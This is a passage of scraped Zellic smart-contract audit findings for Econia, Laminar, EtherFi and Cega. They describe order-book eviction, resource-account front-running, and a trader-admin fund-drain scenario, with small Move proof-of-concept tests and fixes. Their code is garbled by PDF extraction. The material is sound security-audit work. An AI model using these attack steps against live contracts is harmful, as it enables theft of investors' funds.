impossible because of the per-transaction gas limit). Econia Labs acknowledged this finding and created a GitHub issue to discuss reme- diations. They provided the following response to our proof of concept: When we were designing the AVL queue we imposed the critical height con- straints basically to prevent the data structure from getting too large: the more tree nodes, the more it costs to insert or delete. Hence the eviction schema, which is supposed to solve a different DOS attack vector: placing a bunch of small orders that grow the tree grows too large and eats up gas. Per the eviction approach, if someone places an order far away from the spread, they risk getting evicted if someone comes along with a better order. But as you demonstrated, this approach could lead to adversarial behavior. The critical height of the AVL queue (econia:)market:)CRITICAL_HEIGHT) was increased from 10 to 18 in commit 9b3cada1. This makes it harder for an attacker to exploit this issue without risk, but it does not completely eliminate the issue. The increased critical height requires 16,383 orders to be inserted in order to guarantee fully evicting all the orders on one side of the book (per the calculations provided by the Econia team). This is impossible to accomplish in a single transaction due to the current max compute limit in place on Aptos. However, the attack is still viable if an attacker accepts the risk of some of their ma- licious orders being filled. Note that the capital cost of inserting many orders is not necessarily high and varies on the minimum order size for the market and the price level at which the orders are inserted. Zellic Econia Labs Additionally, an attacker might not be interested in evicting one side of the order book as a whole but might still find advantageous to evict the tail of the orders. In general, an attacker has the ability to choose a price cutoff and evict all orders that have a price that is worse (lower or higher, depending on the side being attacked) by posting malicious orders with a better price. This price does not have to be the best price for the chosen side of the order book, but it can instead be in between other better priced orders (which will not be evicted) and the victim ones. This makes it possible to evict the majority of the orders on the book without significant risk even without doing so in a single transaction, since the malicious orders will not be filled unless all the other better priced ones are filled first. Econia Labs provided the following notes: We have added a section to our documentation about the topic and how to avoid making erroneous assumptions as an integrating protocol: https://econia.dev/overview/orders#adversarial-considerations We have started looking into a B+ tree (per discussions with @fcremo ) that is unaffected by eviction behavior, and are considering it as an upgradeable feature pending more research: https://github.com/econia-labs/econia/issues/62 Zellic Econia Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Econia - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Cancelling nonexistent market order IDs aborts", + "labels": [ + "Zellic" + ], + "body": "Target: econia:)market Category: Coding Mistakes Likelihood: Informational Severity: Informational : Informational Cancelling a market order ID that does not exist in the AVL queue ungracefully aborts with the following error: native fun borrow_box_mut(table: &mut Table, key: K): &mut Box; ^^^^^^^^^^^^^^ \u2502 Test was not expected to abort but it aborted with 25863 here In this function in 0x1:)table To reproduce this issue, use the following test: #)test] fun test_nonexistent_market_order_id() acquires OrderBooks { let (_, user_1) = init_markets_users_integrator_test(); let nonexistent_market_order_id = 0xdeadbeef; cancel_order_user(&user_1, MARKET_ID_COIN, ASK, nonexistent_market_order_id); } The function call chain to the offending borrow_box_mut call is market:)cancel_order avl_queue:)remove avl_queue:)remove_list_node avl_queue:)remove_list_node_update_edges The borrow_mut line below causes the transaction to abort: } else { /) If node was not list head: /) Mutably borrow last list node. Zellic Econia Labs let list_node_ref_mut = table_with_length:)borrow_mut( list_nodes_ref_mut, last_node_id); It may be more difficult for developers building on Econia to debug code cancelling a nonexistent market order ID. Assert that the market order ID exists, or otherwise, gracefully exit if the node is not found in the AVL queue. Econia remediated the issue in commit 7549fef. Zellic Econia Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/Econia - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Duplicate call in coin register", + "labels": [ + "Zellic" + ], + "body": "Target: dex::stake Category: Coding Mistakes Likelihood: High Severity: High : High The following function register_staking_account calls coin:)register twice via the following snippet: if (!coin:)is_account_registered(addr)) { coin:)register(account); coin:)register(account); }; Users will not be able to register a staking account as the second coin:)register fails due to the following assert statement in the coin:)register function: assert!( !is_account_registered(account_addr), error:)already_exists(ECOIN_STORE_ALREADY_PUBLISHED), ); We recommend removing one of the coin:)register calls. Laminar acknowledged this finding and implemented a fix in commit 691c. Zellic Laminar", + "html_url": "https://github.com/Zellic/publications/blob/master/Laminar - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Potential frontrunning in orderbook create", + "labels": [ + "Zellic" + ], + "body": "Target: dex::book Category: Coding Mistakes Likelihood: High Severity: High : High The book:)create_orderbook function calls account:)create_resource_account. The latter takes a signer and a seed to calculate an address and then creates an account at that address. This behavior is shown in the following snippet: let seed_guid = account:)create_guid(account); let seed = bcs:)to_bytes(&seed_guid); let (book_signer, book_signer_cap) = account:)create_resource_account(account, seed); If the address of the signer and the seed are known, the address that account:)creat e_resource_account will use can be determined. Therefore, an attacker can front-run book:)create_orderbook by creating an account at the right address, causing book:)c reate_orderbook to revert. The seed and address are trivial to determine; an address is public information and the seed is simply the guid_creation_num member of the Account struct. Therefore, the seed can be read from the blockchain. Affected users will not be allowed to create orderbooks, which will result in them not being able to use the market. The following unit test demonstrates how an attacker could front-run book:)create_ orderbook: #)test(account = @dex)] #)expected_failure] fun create_fake_orderbook(account: &signer) { create_fake_coins(account); let victim_addr = signer:)address_of(account); let guid_creation_num = account:)get_guid_next_creation_num(victim_addr); Zellic Laminar let seed_id = guid:)create_id(victim_addr, guid_creation_num); let seed_guid = GUID { id: seed_id }; let seed = bcs:)to_bytes(&seed_guid); let new_addr = account:)create_resource_address(&victim_addr, seed); aptos_account:)create_account(new_addr); /) Should fail book:)create_orderbook(account, 3, 3, 1000); } We have provided the full PoC to Laminar for reproduction and verification. Consider using a nondeterministic seed to create the resource account. Commit 925e8a4 in aptos-core, introduced by Aptos during the audit prevents the front running of resource accounts via an override if an account exists at the resourc e_addr. let resource = if (exists_at(resource_addr)) { let account = borrow_global(resource_addr); assert!( option:)is_none(&account.signer_capability_offer.for), error:)already_exists(ERESOURCE_ACCCOUNT_EXISTS), ); assert!( account.sequence_number =) 0, error:)invalid_state(EACCOUNT_ALREADY_USED), ); create_signer(resource_addr) Zellic Laminar", + "html_url": "https://github.com/Zellic/publications/blob/master/Laminar - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Order checker functions use full order size rather than re- maining order size", + "labels": [ + "Zellic" + ], + "body": "Target: dex::book Category: Coding Mistakes Likelihood: High Severity: High : High book:)can_bid_be_matched and book:)can_ask_be_matched check if an order can be filled using an order book. It intends to add up the remaining sizes on the orders in the order book that can match the bid/ask. However, instead of adding up the remaining sizes of these orders, it adds up the full sizes of these orders, as shown in the example below. let bid_size = (order:)get_size(bid) as u128); This is problematic because some orders may have been partially fulfilled. In some instances the checker functions would count these partially fulfilled orders at their full values. But when the DEX tries to match these orders, it may fill the orders less than book:)can_bid_be_matched/book:)can_ask_be_matched indicated the order could be filled. book:)can_bid_be_matched and book:)can_ask_be_matched may indicate that an order can be fully matched when it is not fully matchable. This would cause the following line in book:)place_bid_limit_order/book:)place_ask_limit_order to revert: assert!(order:)get_remaining_size(&order) =) 0, ENO_MESSAGE); Change the order:)get_size call to order:)get_remaining_size Laminar acknowledged this finding and implemented a fix in commit 0a71. Zellic Laminar", + "html_url": "https://github.com/Zellic/publications/blob/master/Laminar - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Potentially incorrect implementation of multiple queue op- erations", + "labels": [ + "Zellic" + ], + "body": "Target: flow::queue Category: Coding Mistakes Likelihood: Low Severity: Medium : Medium queue:)remove handles index_to_remove three different ways based on if it is the head, tail, or neither. In the case index_to_remove is neither, there is an assertion that ensures that the node at prev_index is actually before index_to_remove: assert!(guarded_idx:)unguard(prev_node.next) =) index_to_remove, EINVALID_REMOVAL); The same check should occur in the case that index_to_remove is the tail since the previous node is still relevant in this case: let prev_node = vector:)borrow_mut(&mut queue.nodes, *option:)borrow(&prev_index)); prev_node.next = guarded_idx:)sentinel(); Furthermore, queue:)remove cannnot handle a queue of length one. It will set the head to the sentinel value but not the tail. The following operations will bring about this issue: #)test] #)expected_failure (abort_code=EQUEUE_MALFORMED)] fun test_corrupt_queue_with_remove() { let queue = new(); enqueue(&mut queue, 10); /) The third argument is irrelevant remove(&mut queue, 0, option:)some(4)); enqueue(&mut queue, 1); } Subsequent queue operations will notice that the head is a sentinel but the tail is not, Zellic Laminar causing them to abort. Next, in queue:)has_next, there is an assertion followed by an if statement and a sec- ond assertion that will never fail: assert!(!is_empty(queue), EQUEUE_EMPTY); if (!is_empty(queue) &) guarded_idx:)is_sentinel(iter.current)) { ...)) } else { assert!(!guarded_idx:)is_sentinel(iter.current), EITERATOR_DONE); ...)) } The first term of the boolean expression will always evaluate to true and the assert in the else block will never abort. Therefore they are unecessary to add from a gas perspective. Each of the points has the potential to corrupt the queue. However, the impact is more limited since book:)move is less likely to use the queue in unintended ways. Modify the implementation of the queue operations described to fix the issues. For the first issue, add the assertion to the else if block. For the second issue, a queue of length one should be handled as a special case and the queue object should be cleared. For the third issue, remove the first term of the boolean expression in the if state- ment. Also, remove the first assert in the else block. Laminar acknowledged this finding and implemented a fix in commits 0ceb, d1aa and 7e01. Zellic Laminar 4 Formal Verification The MOVE prover allows for formal specifications to be written on MOVE code, which can provide guarantees on function behavior as these specifications are exhaustive on every possible input case. During the audit period, we provided Laminar with Move prover specifications, a form of formal verification. We found the prover to be highly effective at evaluating the entirety of certain functions\u2019 behavior and recommend the Laminar team to add more specifications to their code base. One of the issues we encountered was that the prover does not support recursive code yet and thus such places had to be ignored. Nevertheless, recursive support is coming prompty as seen in this commit here. The following is a sample of the specifications provided.", + "html_url": "https://github.com/Zellic/publications/blob/master/Laminar - Zellic Audit Report.pdf" + }, + { + "title": "4.1 dex::order Verifies setter functions: spec set_size { aborts_if false; ensures order.size =) size; } spec set_price { aborts_if false; ensures order.price =) price;", + "labels": [ + "Zellic" + ], + "body": "4.1 dex::order Verifies setter functions: spec set_size { aborts_if false; ensures order.size =) size; } spec set_price { aborts_if false; ensures order.price =) price; }", + "html_url": "https://github.com/Zellic/publications/blob/master/Laminar - Zellic Audit Report.pdf" + }, + { + "title": "4.2 dex::instrument Verifies resources exist and return value upon function invocation: spec create { ensures result.price_decimals =) price_decimals; Zellic Laminar ensures exists)(signer:)address_of(account)); ensures exists)(signer:)address_of(account));", + "labels": [ + "Zellic" + ], + "body": "4.2 dex::instrument Verifies resources exist and return value upon function invocation: spec create { ensures result.price_decimals =) price_decimals; Zellic Laminar ensures exists)(signer:)address_of(account)); ensures exists)(signer:)address_of(account)); }", + "html_url": "https://github.com/Zellic/publications/blob/master/Laminar - Zellic Audit Report.pdf" + }, + { + "title": "4.3 dex::coin Verifies coin of type T exists after registration: spec register { ensures exists)(signer:)address_of(account));", + "labels": [ + "Zellic" + ], + "body": "4.3 dex::coin Verifies coin of type T exists after registration: spec register { ensures exists)(signer:)address_of(account)); }", + "html_url": "https://github.com/Zellic/publications/blob/master/Laminar - Zellic Audit Report.pdf" + }, + { + "title": "4.4 flow::guarded_idx Verifies when guards behavior: spec guard { aborts_if value =) SENTINEL_VALUE; ensures result =) GuardedIdx {value}; } spec unguard { aborts_if is_sentinel(guard); ensures result =) guard.value; } spec try_guard { aborts_if false; ensures value !) SENTINEL_VALUE ==> result =) GuardedIdx {value}; } spec fun spec_none(): Option { Option{ vec: vec() } } spec fun spec_some(e: Element): Option { Option{ vec: vec(e) } } Zellic Laminar spec try_unguard { ensures guard.value =) SENTINEL_VALUE ==> result =) spec_none(); ensures guard.value !) SENTINEL_VALUE ==> result =) spec_some(guard.value);", + "labels": [ + "Zellic" + ], + "body": "4.4 flow::guarded_idx Verifies when guards behavior: spec guard { aborts_if value =) SENTINEL_VALUE; ensures result =) GuardedIdx {value}; } spec unguard { aborts_if is_sentinel(guard); ensures result =) guard.value; } spec try_guard { aborts_if false; ensures value !) SENTINEL_VALUE ==> result =) GuardedIdx {value}; } spec fun spec_none(): Option { Option{ vec: vec() } } spec fun spec_some(e: Element): Option { Option{ vec: vec(e) } } Zellic Laminar spec try_unguard { ensures guard.value =) SENTINEL_VALUE ==> result =) spec_none(); ensures guard.value !) SENTINEL_VALUE ==> result =) spec_some(guard.value); }", + "html_url": "https://github.com/Zellic/publications/blob/master/Laminar - Zellic Audit Report.pdf" + }, + { + "title": "3.1 The claimReceiverContract variable is not fully validated", + "labels": [ + "Zellic" + ], + "body": "Target: EarlyAdopterPool Category: Coding Mistakes Likelihood: Low Severity: High : Medium When the user is claiming funds through the claim() function, all of the user\u2019s de- posited funds are sent to the claimReceiverContract, which is set by the owner. This is a storage variable that is set using the setClaimReceiverContract() function. Within the setClaimReceiverContract() function, the only validation done on the ad- dress of the contract is to ensure that it is not address(0). This validation is not enough, as it is possible for the owner to set the address to a contract that is not able to transfer out any ETH or ERC20 tokens that it receives. In this instance, the user\u2019s funds would be lost forever. There is a risk that user funds may become permanently locked either by accident or as a result of deliberate actions taken by a malicious owner. See Ethereum Improvement Proposal EIP-165 for a way to determine whether a con- tract implements a certain interface. This will prevent the owner from making a mis- take, but it will not prevent a malicious owner from locking user funds forever. Alternatively, consider not allowing this contract address to be modified by the owner. It should be made immutable. If the receiver contract\u2019s implementation needs to change in the future, consider using a proxy pattern to do that. Gadze Finance SEZC acknowledged this finding and stated that they understand the risk, but have mitigated it by ensuring that multiple parties are involved when setting the receiver contract. Their official response is produced below. Zellic Gadze Finance SEZC The receiver contract has not been set yet and will be set through multiple parties being involved with the decision, we do understand the risk however, we have mitigated this with multiple parties being involved. We do understand it only takes 1 address to make the call and this is a risk. Zellic Gadze Finance SEZC", + "html_url": "https://github.com/Zellic/publications/blob/master/EtherFi_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.2 Using values from emitted events may not be fully accurate", + "labels": [ + "Zellic" + ], + "body": "Target: EarlyAdopterPool Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The getContractTVL() function uses the contract\u2019s balance of ERC20 tokens and Ether to determine the TVL of the pool. function getContractTVL() public view returns (uint256 tvl) { tvl = (rETHInstance.balanceOf(address(this)) + wstETHInstance.balanceOf(address(this)) + sfrxETHInstance.balanceOf(address(this)) + cbETHInstance.balanceOf(address(this)) + address(this).balance); } This function is then used when emitting events related to TVL. The issue is that the balance of the ERC20 tokens in the contract, as well as the balance of Ether in the contract, can be manipulated by any user by sending tokens / Ether di- rectly to the contract (as opposed to going through the deposit() function). Therefore, depending on the TVL values returned from this function (and, by extension, emitted through the events such as ERC20TVLUpdated) may be inaccurate. Without knowing how the values emitted through these events are used off chain, it is impossible to determine the impact. Consider tracking the balance of tokens and Ether in the contract separately through storage variables. This will prevent directly transferred tokens and Ether from being counted towards the TVL. Otherwise, ensure that the values emitted by TVL-related events are not used for critical operations off chain. Zellic Gadze Finance SEZC Gadze Finance SEZC acknowledged this finding and stated that they want to include any funds sent to the contract to be included in the TVL. Their official response is produced below. We understand the issue revolving an inaccurate TVL due to the contract being able to receive funds through direct transfers, however, we would still like to include any funds sent to the contract in our total value locked. Zellic Gadze Finance SEZC", + "html_url": "https://github.com/Zellic/publications/blob/master/EtherFi_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.3 Magic numbers should be replaced with immutable con- stants", + "labels": [ + "Zellic" + ], + "body": "Target: EarlyAdopterPool Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational There are a number of places in the code where magic numbers are used. For brevity\u2019s sake, the following is a list of line numbers where magic numbers are being used: 187 218 225 to 228 233 to 235 The use of magic numbers makes the code confusing, both for the developers in the future and for auditors. Consider replacing magic numbers with immutable constants. In instances where the magic number is used as a flag to determine which branch a function should take, consider using either an enum or separating the logic out into multiple functions. Gadze Finance SEZC acknowledged this finding and stated that they are not worried about this issue. The finding was partially remediated by refactoring the way the magic numbers are used in commit ebd3f11a. Their official response is produced below. The magic numbers have either been marked immutable or removed and sim- plified. It was often the use of the numbers to simplify large numbers for the reader. Zellic Gadze Finance SEZC", + "html_url": "https://github.com/Zellic/publications/blob/master/EtherFi_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.4 Use the correct function modifiers", + "labels": [ + "Zellic" + ], + "body": "Target: EarlyAdopterPool Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The withdraw() function is marked as payable. This is incorrect as it does not make use of any ETH that it might (accidentally or otherwise) receive. The withdraw() and claim() functions are marked as public, although they are not used anywhere else in the contract. Functions that are marked as payable expect that ETH may be received. If the function does not account for this, then users may accidentally send ETH when invoking these functions, leading to a loss of funds. Functions that are only called externally should be marked as external. Remove the payable modifier from the withdraw() function. Replace the public modifier with the external modifier in the withdraw() and claim() functions. Gadze Finance SEZC acknowledged and partially remediated this finding by removing the payable modifier from the withdraw() function in commit b7be224c. Zellic Gadze Finance SEZC", + "html_url": "https://github.com/Zellic/publications/blob/master/EtherFi_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.5 Use safe ERC20 functions", + "labels": [ + "Zellic" + ], + "body": "Target: EarlyAdopterPool Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational This contract makes use of the ERC20 transfer() and transferFrom() functions. Not all ERC20 tokens adhere to the standard definition of these functions. The tokens that are used in this contract (rETH, wstETH, sfrxETH, cbETH) all adhere to the ERC20 token standard, so there is no impact. However, the cbETH token contract specifically uses a proxy pattern, which means that the contract is upgradable. If it were ever to upgrade to a new implementation where the transfer() or transferFro m() functions did not adhere to the standard anymore, then the contract would stop functioning. Consider replacing the use of transfer() and transferFrom() with the safe ERC20 safeTransfer() and safeTransferFrom() functions. Gadze Finance SEZC acknowledged this issue and contacted the Coinbase team to en- sure there were no planned upgrades to the cbETH token contract that would change the transfer() and transferFrom() function definitions. The Coinbase team confirmed that this was the case. Their official response is produced below. The ERC20 tokens being used with transfers have been checked by the team and they all follow the same patterns. Due to these being the only tokens used, with no option to add others, we are happy with the implementation. Zellic Gadze Finance SEZC", + "html_url": "https://github.com/Zellic/publications/blob/master/EtherFi_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.6 Unused variables should be removed", + "labels": [ + "Zellic" + ], + "body": "Target: EarlyAdopterPool Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The following storage variables are not used anywhere in the contract: 1. SCALE 2. multiplierCoefficient In the calculateUserPoints() function, the numberOfMultiplierMilestones variable is initialized but not used: function calculateUserPoints(address _user) public view returns (uint256) { /) [ ...)) ] /)Variable to store how many milestones (3 days) the user deposit lasted uint256 numberOfMultiplierMilestones = lengthOfDeposit / 259200; if (numberOfMultiplierMilestones > 10) { numberOfMultiplierMilestones = 10; } /) [ ...)) ] } Unused variables introduce unnecessary complexity to the code and may lead to pro- grammer error in the future. Remove the variables unless there are plans to use them in the future. Zellic Gadze Finance SEZC The SCALE variable was removed in commit 8d080521 The multiplierCoefficient variable was removed in commit 1e5e61bc The numberOfMultiplierMilestones variable was removed in commit f23285b7 Zellic Gadze Finance SEZC 4 Threat Model This provides a full threat model description for various functions. As time permitted, we analyzed each function in the smart contracts and created a written threat model for some critical functions. A threat model documents a given function\u2019s externally controllable inputs and how an attacker could leverage each input to cause harm. Not all functions in the audit scope may have been modeled. The absence of a threat model in this section does not necessarily suggest that a function is safe.", + "html_url": "https://github.com/Zellic/publications/blob/master/EtherFi_-_Zellic_Audit_Report.pdf" + }, + { + "title": "4.1 Module: EarlyAdopterPool.sol Function: claim() Used to claim user funds. Branches and code coverage (including function calls) Intended branches", + "labels": [ + "Zellic" + ], + "body": "Allows user to claim rewarded funds successfully. 4\u25a1 Test coverage Negative behavior Should fail if claiming is not open. 4\u25a1 Negative test Should fail if the claimReceiverContract is not set. 4\u25a1 Negative test Should fail if the claimDeadline has been reached. 4\u25a1 Negative test Should fail if the user has not deposited anything. \u25a1 Negative test Function: depositEther() Used to deposit Ether into the contract. Branches and code coverage (including function calls) Intended branches Zellic Gadze Finance SEZC User is able to deposit Ether successfully. 4\u25a1 Test coverage The correct events are successfully emitted. Negative behavior Deposit should fail if claiming is open (i.e., depositing is closed). \u25a1 Negative test Function: deposit(address _erc20Contract, uint256 _amount) Used to deposit ERC20 tokens into the contract. Inputs _erc20Contract \u2013 Control: Fully controlled. \u2013 Constraints: Must be one of the whitelisted tokens (rETH, sfrxETH, wstETH, cbETH). \u2013 : This is the token that is transferred out of the user\u2019s wallet to this contract. _amount \u2013 Control: Fully controlled. \u2013 Constraints: Must be between minDeposit (0.1 Ether) and maxDeposit (100 Ether). \u2013 : This is the amount of tokens transferred out of the user\u2019s wallet to this contract. Branches and code coverage (including function calls) Intended branches User is successfully able to deposit all four tokens into the contract. 4\u25a1 Test coverage The correct events are successfully emitted. 4\u25a1 Test coverage Negative behavior Deposit should fail if the user provides an unsupported token contract address. \u25a1 Negative test Deposit should fail if claiming is open (i.e., depositing is closed). \u25a1 Negative test Zellic Gadze Finance SEZC Function call analysis deposit -> _erc20Contract.transferFrom(msg.sender, address(this), _amount ) \u2013 What is controllable?: _amount. \u2013 If return value controllable, how is it used and how can it go wrong?: N/A. \u2013 What happens if it reverts, reenters, or does other unusual control flow?: If it reverts, nothing happens. If it reenters, no harm can be done as the checks-effects-interactions pattern is used. Function: setClaimReceiverContract(address _receiverContract) Sets the contract that will receive claimed funds. Inputs _receiverContract \u2013 Control: Fully controlled. \u2013 Constraints: Cannot be address(0). \u2013 : User funds are transferred to this contract when funds are claimed. Branches and code coverage (including function calls) Intended branches The claim receiver contract address is set successfully. 4\u25a1 Test coverage The required events are emitted. \u25a1 Test coverage Negative behavior Should fail if not called by the owner. 4\u25a1 Negative test Should fail if the address of the contract is address(0). 4\u25a1 Negative test Function: setClaimingOpen(uint256 _claimDeadline) Sets claiming to open with a specified _claimDeadline. Inputs _claimDeadline Zellic Gadze Finance SEZC \u2013 Control: Fully controlled. \u2013 Constraints: N/A. \u2013 : Claiming will close when this deadline is reached. Branches and code coverage (including function calls) Intended branches Should open claiming and set the deadline successfully. \u25a1 Test coverage Should emit the required events successfully. \u25a1 Test coverage Negative behavior Should fail if not called by the contract owner. 4\u25a1 Negative test Function: withdraw() Used to withdraw all funds the user may have deposited into this contract. Branches and code coverage (including function calls) Intended branches User is able to withdraw funds successfully. 4\u25a1 Test coverage Zellic Gadze Finance SEZC 5 Audit Results At the time of our audit, the code was not deployed to mainnet EVM. During our audit, we discovered six findings. Of these, one was of medium risk and five were suggestions (informational). Gadze Finance SEZC acknowledged all findings and implemented fixes for some of them.", + "html_url": "https://github.com/Zellic/publications/blob/master/EtherFi_-_Zellic_Audit_Report.pdf" + }, + { + "title": "3.1 Missing valid vault address check in processDepositQueue", + "labels": [ + "Zellic" + ], + "body": "Target: FCNProduct Category: Coding Mistakes Likelihood: Medium Severity: High : High Investors are able to deposit assets into an FCNVault through the FCNProduct contract\u2019s addToDepositQueue() function. This function pulls funds from the investor\u2019s wallet and adds Deposit objects into a global depositQueue array within the FCNProduct contract. Subsequently, a trader admin is able to call processDepositQueue() to process these Deposit objects inside the depositQueue. On a high level, the processDepositQueue() function does the following: 1. Loops over the depositQueue a maximum of maxProcessCount times, or until it is empty. 2. For each deposit, it tracks the amount being deposited in the vault\u2019s metadata storage, accessed using the passed-in vaultAddress. 3. It calls the vault\u2019s deposit() function with the deposit amount and receiver ad- dress. This will send share tokens to the receiver. 4. If the depositQueue is empty afterwards, it will delete the queue. 5. Otherwise, it will shift over all remaining deposits in the queue to the beginning of the queue. Now, there are only two checks in processDepositQueue() that are used to determine whether the vaultAddress that is passed corresponds to a valid, usable vault. They are as follows: function processDepositQueue(address vaultAddress, uint256 maxProcessCount) public onlyTraderAdmin { FCNVaultMetadata storage vaultMetadata = vaults[vaultAddress]; require(vaultMetadata.vaultStatus =) VaultStatus.DepositsOpen, \u201c500:WS\u201d); Zellic Sanic Pte. Ltd. FCNVault vault = FCNVault(vaultAddress); require(!(vaultMetadata.underlyingAmount =) 0 &) vault.totalSupply() > 0), \u201c500:Z\u201d); /) [...))] } These two checks are not enough. For example, if the trader admin deploys a mali- cious vault contract, then they can bypass both checks by doing the following: 1. Calling openVaultDeposits() with the address of their malicious vault contract. 2. Ensuring that their malicious vault contract contains a totalSupply() function that returns a value greater than zero. function openVaultDeposits(address vaultAddress) public onlyTraderAdmin { FCNVaultMetadata storage vaultMetadata = vaults[vaultAddress]; vaultMetadata.vaultStatus = VaultStatus.DepositsOpen; } After this is done, both of the checks will pass, and the code will treat the malicious vault as a valid FCNVault contract. A malicious trader admin can steal investors\u2019 funds using the following steps. The funds being stolen here come out of funds that are currently awaiting to be deposited. 1. Set up a fake malicious vault contract as described in the previous section with an empty deposit() function and a maliciously crafted redeem() function (see further below). 2. Wait for investors to add deposits into the depositQueue. 3. Call processDepositQueue() with the malicious vault address as many times as needed to process all deposits in the queue. This sets the vault\u2019s status to NotT raded. 4. Call setTradeData() with the _tradeExpiry set to a time in the past. Zellic Sanic Pte. Ltd. 5. Call sendAssetsToTrade() to send the deposited assets to the market maker. This sets the vault\u2019s status to Traded. 6. Call calculateCurrentYield() with the malicious vault address. This will set the vault\u2019s status to TradeExpired. 7. Call calculateVaultFinalPayoff() with the malicious vault address. This will set the vault\u2019s status to PayoffCalculated. 8. Call collectFees() with the malicious vault address. This will set the vault\u2019s status to FeesCollected. 9. Queue a withdrawal to a trader admin\u2013controlled wallet address using the add ToWithdrawalQueue() function. Any amountShares is fine here. 10. Call processWithdrawalQueue(). This function ends up calling the vault\u2019s rede em() function to determine how many assets to return to the receiver of the withdrawal. 11. Since this is the Trader Admin\u2019s malicious vault contract, all they need to do is ensure that the malicious redeem() function returns balanceOf(address(fcnProd uct)) for themselves and 0 for all other receivers. After the final step, all asset tokens in the FCNProduct contract will be transferred out to the wallet address specified in step 9. In receiveAssetsFromCega(), we see the following: function receiveAssetsFromCegaState(address vaultAddress, uint256 amount) public { require(msg.sender =) address(cegaState), \u201c403:CS\u201d); FCNVaultMetadata storage vaultMetadata = vaults[vaultAddress]; /) a valid vaultAddress will never have vaultStart = 0 require(vaultMetadata.vaultStart !) 0, \u201c400:VA\u201d); IERC20(asset).safeTransferFrom(msg.sender, address(this), amount); vaultMetadata.currentAssetAmount += amount; } This same check should be added to processDepositQueue() and all other places where a vaultAddress is passed in as an argument. This will prevent invalid vault contract addresses from being used in the contract. Zellic Sanic Pte. Ltd. The client has acknowledged and remediated this issue by adding an onlyValidVau lt modifier that guarantees that the vaultAddress argument passed to all required functions is valid. This was done in commit f64513a9. Zellic Sanic Pte. Ltd.", + "html_url": "https://github.com/Zellic/publications/blob/master/Cega - Zellic Audit Report.pdf" + }, + { + "title": "3.2 A malicious or compromised trader admin may lead to locked funds", + "labels": [ + "Zellic" + ], + "body": "Target: FCNProduct Category: Coding Mistakes Likelihood: Low Severity: Medium : High Investors in the Cega protocol use the FCNProduct contract\u2019s addToDepositQueue() function to deposit their funds. This function uses safeTransferFrom() to transfer asset tokens from the investor\u2019s address to the FCNProduct contract. function addToDepositQueue(uint256 amount, address receiver) public { require(isDepositQueueOpen, \u201c500:NotOpen\u201d); queuedDepositsCount += 1; queuedDepositsTotalAmount += amount; require(queuedDepositsTotalAmount + sumVaultUnderlyingAmounts <) maxDepositAmountLimit, \u201c500:TooBig\u201d); IERC20(asset).safeTransferFrom(receiver, address(this), amount); depositQueue.push(Deposit({ amount: amount, receiver: receiver })); emit DepositQueued(receiver, amount); } Once these funds are deposited, the only way for the funds to leave the contract are through the following functions: 1. collectFees() - Only callable by the trader admin. Used to collect fees for the Cega protocol. 2. processWithdrawalQueue() - Only callable by the trader admin. Used to process investor withdrawals. 3. sendAssetsToTrade() - Only callable by the trader admin. Used to send de- posited assets to a market maker. As there are no other ways to take deposited funds out of the contract, a malicious or compromised trader admin may choose simply to not call any of these functions. If this were to happen, any deposited investor funds (and any other funds in the con- tract) will become locked in the contract forever. Zellic Sanic Pte. Ltd. A compromised or malicious trader admin can lead to funds being locked in the FCNP roduct contract forever. Consider adding a sweep-style function that allows the protocol to transfer out any tokens in the contract to a chosen address. Ideally, this function should only be ac- cessible by the default admin multi-sig role. function sweepTokens(address receiver) external onlyDefaultAdmin { IERC20(asset).safeTransfer(receiver, IERC20(asset).balanceOf(address(this))); } The client has acknowledged this issue, and has stated that it is mitigated due to the fact that the DefaultAdmin role can assign a new TraderAdmin through the CegaState contract. Zellic Sanic Pte. Ltd.", + "html_url": "https://github.com/Zellic/publications/blob/master/Cega - Zellic Audit Report.pdf" + }, + { + "title": "3.3 The vaultAddress validity check can be bypassed", + "labels": [ + "Zellic" + ], + "body": "Target: FCNProduct Category: Coding Mistakes Likelihood: Low Severity: Medium : Medium In the receiveAssetsFromCegaState() function, the following code is used to determine whether the vaultAddress passed to it corresponds to a valid vault: function receiveAssetsFromCegaState(address vaultAddress, uint256 amount) public { require(msg.sender =) address(cegaState), \u201c403:CS\u201d); FCNVaultMetadata storage vaultMetadata = vaults[vaultAddress]; /) a valid vaultAddress will never have vaultStart = 0 require(vaultMetadata.vaultStart !) 0, \u201c400:VA\u201d); IERC20(asset).safeTransferFrom(msg.sender, address(this), amount); vaultMetadata.currentAssetAmount += amount; } This check looks correct at first glance because the only way to get a vault metadata\u2019s vaultStart property set is through the createVault() function, which always creates an instance of an FCNVault contract: function createVault( string memory _tokenName, string memory _tokenSymbol, uint256 _vaultStart ) public onlyTraderAdmin returns (address vaultAddress) { require(_vaultStart !) 0, \u201c400:VS\u201d); FCNVault vault = new FCNVault(asset, _tokenName, _tokenSymbol); address newVaultAddress = address(vault); vaultAddresses.push(newVaultAddress); /) vaultMetadata & all of its fields are automatically initialized if it doesn't already exist in the mapping FCNVaultMetadata storage vaultMetadata = vaults[newVaultAddress]; vaultMetadata.vaultStart = _vaultStart; vaultMetadata.vaultAddress = newVaultAddress; Zellic Sanic Pte. Ltd. emit VaultCreated(newVaultAddress, vaultAddresses.length - 1); return newVaultAddress; } However, the rolloverVault() function can allow a malicious or compromised trader admin to bypass this check. The rolloverVault() function is missing a check to ensure that the vaultAddress passed to it is valid: function rolloverVault(address vaultAddress) public onlyTraderAdmin { FCNVaultMetadata storage vaultMetadata = vaults[vaultAddress]; require(vaultMetadata.vaultStatus =) VaultStatus.WithdrawalQueueProcessed, \u201c500:WS\u201d); require(vaultMetadata.tradeExpiry !) 0, \u201c400:TE\u201d); vaultMetadata.vaultStart = 